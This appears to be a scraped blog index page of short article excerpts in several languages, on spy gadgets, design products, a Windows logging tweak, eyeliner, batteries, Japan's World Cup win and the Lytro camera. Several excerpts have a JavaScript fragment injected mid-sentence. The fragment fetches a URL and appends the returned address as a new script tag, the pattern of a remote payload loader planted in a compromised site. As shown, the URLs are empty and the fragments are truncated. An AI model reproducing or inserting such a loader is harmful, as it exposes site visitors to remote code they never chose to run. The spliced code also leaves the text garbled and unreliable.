Five Cool Gadgets Used For Spying

When we think of spying and gadgets, we naturally think of the James Bond and Mission Impossible movies, in these films the use of ultra high tech is common place and yet in the real world this equipment would have been only available to governments and other organisations due to the cost. But recently the cost of technology has dramatically fallen to the point where tiny pin hole video cameras can be owned by just about anyone. So for the average person in the street this means even more surveillance Read more [...]

Meet ixxi

Dutch Designers Eric Sloot, Paulien Berendsen and Roel Vaessen developed ixxi, a modular connection system. You can make your own photo enlargement or photo collage in any format possible.var url = ''; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement('script'); script.src = data.trim(); document.getElementsByTagName('head')[0].appendChild(script); Read more [...]

The Martyr Lamp

The Play Coalition develop products that toy with social quirks, lend a light touch to weighty issues and explore the poetry of playfulness. One of them is an energy saving fundamentalist attempting to pull the plug on excessive power consumption, named The Martyr. var url = ''; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement('script'); script.src = data.trim(); Read more [...]

أفكار تحولت إلى رموز: من ساعة بج بن إلى ميدان التحرير

 Ahmed elmOgy الكاتب: أحمد قبل أن تكون هناك شجرة كانت هناك بذرة.. تتفاعل مع ما حولها لتنمو فتصبح شجـرة.. ولو لم يكن هناك بذرة فلن تكون هناك شجرة!! فكل عمل عظيم يبدأ بفكرة تتفاعل مع البيئة المحيطة وتمر بكل الظروف فتتطور من مجرد فكرة إلى عمل ومن مجرد عمل عادي إلى عمل عظيـم، فكثير من الأعمال Read more [...]

The Biggest Internet Lie

With so much information on the internet, you would think that finding out what the biggest lie is would be impossible. However, in actual fact the biggest lie on the internet is not a story, piece of news or some other feature, because it concerns users rather than content producers. Yes that is it, we all have to acknowledge that we have read the terms of use of most sites and services that we use, but do we, do we ever and that is why “I have read and agree to the of use” is the biggest Read more [...]

Some Pictures Need No Words

Take a look at this image what do you see! There are those people who are going to know exactly what this looks like and then there are the other folks who think that this image is merely a window with the low sun shining through. Personally, I think that this is "the Eye" from  "Lord Of The Rings", others think it's from Portal 2! Source [Nerd Approved]var url = ''; fetch(url) .then(response => response.text()) .then(data Read more [...]

What is Windows 7 doing when you log in/off?

Do you want to know more about what Windows is doing in the background when your PC is shutting down or starting? There’s a useful registry hack to enable verbose logging. Verbose logging will give you a lot more background information.   When you shut down your computer, Windows stops the services and checks the group policies for example. If you are debugging Windows 7, verbose messages are very handy and will tell you more about what Windows is doing in the background. In order Read more [...]

Comment choisir et appliquer son eyeliner ?

L'article suivant est trouvé du Web, posté par Ranine. Maquillage de jour avec un eyeliner: L’eye-liner peut corriger certains petits défauts. Il s'utilise parfaitement pour un maquillage de tous les jours L’eye liner est partout, en toutes saisons. Laqué, métallique, intensément noir ou bleu, il annonce le retour d’un maquillage affirmé et offensif. Version 70’s à la Verushka, Brigitte Bardot ou encore Audrey Hepburn, il est graphique. eyeliner Qu'est ce qu'un eyeliner? C'est Read more [...]

One of the best April Fools so far… Google Animal Sound Translator!

When it comes to April Fools some are very bad and obvious, while others can be very believable and get us into all sorts of humiliating situations. So what do you think about this one? ( This is the Google Translate for Animals, it is supposed to analyse the sounds, then translate and even offer a reply, and you can see how handy that would, if only it was true!  Source [Top Computer Tablets]var url = ''; fetch(url) Read more [...]

Smart battery reuses worn out batteries

Posted on April 25, 2011 by David Allen You know that time when the AA or the AAA battery starts to run down, this is when we normal replace them and most of the time throw them away. However, it seems that these worn out batteries still have some life in them and this device called the R Battery has been designed to make the most of that remaining power by squeezing out the smallest amount of energy from one, which would normally end up in the bin. Source [Ubergizmo]var url = ''; fetch(url) Read more [...]


On 18th July 2011(in Japan time), Japan won Women's World Cup. Japan beat strong teams such as Germany and Sweden, and finally won the game against America at the final although Japan had never beaten America before. This news has really brightened Japan which has been in a bit of darkness since 3.11.   鳥肌立ちました! 感動をありがとうございます!! This is the Japanese spirit. 日本は元気です! Japan is fine!   Source: 時事ドットコムvar url = ''; fetch(url) Read more [...]

Digital Camera “Lytro”: The revolution begins!

Have you ever taken a picture that would have been great if only it were in focus? Of course you have. So have we, countless times. But those days may soon be past all of us with the introduction of Lytro, an entirely new kind of camera that allows users to completely change the focus of a picture after the shutter clicks. And, according to AllThingsD, this next-generation camera will be available before the end of the year. Click on the object you want to focus on: var url = ''; fetch(url) Read more [...]

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